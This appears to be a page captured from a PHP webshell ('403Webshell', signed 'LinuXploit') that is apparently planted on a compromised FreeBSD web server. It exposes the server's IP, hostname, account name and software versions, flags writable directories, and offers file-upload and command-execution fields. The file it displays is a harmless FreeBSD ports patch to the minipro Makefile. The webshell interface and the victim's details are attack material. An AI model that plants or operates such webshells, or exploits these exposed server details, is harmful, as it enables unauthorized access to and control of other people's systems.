403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/minipro/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/minipro/files/patch-Makefile
--- Makefile.orig	2022-03-27 01:54:42 UTC
+++ Makefile
@@ -1,16 +1,16 @@
 # Install Configuration
 
 # Your C compiler
-CC=gcc
+CC?=gcc
 #CC=clang
 
 # Compiler options
-CFLAGS = -g -O0 -Wall -DSHARE_INSTDIR="\"$(SHARE_INSTDIR)\""
+CFLAGS += -g -O0 -Wall -DSHARE_INSTDIR="\"$(SHARE_INSTDIR)\""
 
 # Normally minipro is installed to /usr/local.  If you want to put it
 # somewhere else, define that location here.
 PREFIX ?= /usr/local
-MANDIR ?= $(PREFIX)/share/man
+MANDIR ?= $(PREFIX)/man
 
 # Some older releases of MacOS need some extra library flags.
 #EXTRA_LIBS += "-framework Foundation -framework IOKit"
@@ -70,7 +70,7 @@ INCLUDE_INSTDIR=$(DESTDIR)$(PREFIX)/include/libminipro
 LIB_INSTDIR=$(DESTDIR)$(PREFIX)/lib
 SHARE_INSTDIR=$(DESTDIR)$(PREFIX)/share/minipro
 INCLUDE_INSTDIR=$(DESTDIR)$(PREFIX)/include/libminipro
-MAN_INSTDIR=$(DESTDIR)$(PREFIX)/share/man/man1
+MAN_INSTDIR=$(DESTDIR)$(PREFIX)/man/man1
 
 UDEV_DIR=$(shell $(PKG_CONFIG) --define-variable=prefix=$(PREFIX) --silence-errors --variable=udevdir udev)
 UDEV_RULES_INSTDIR=$(DESTDIR)$(UDEV_DIR)/rules.d

Youez - 2016 - github.com/yon3zu
LinuXploit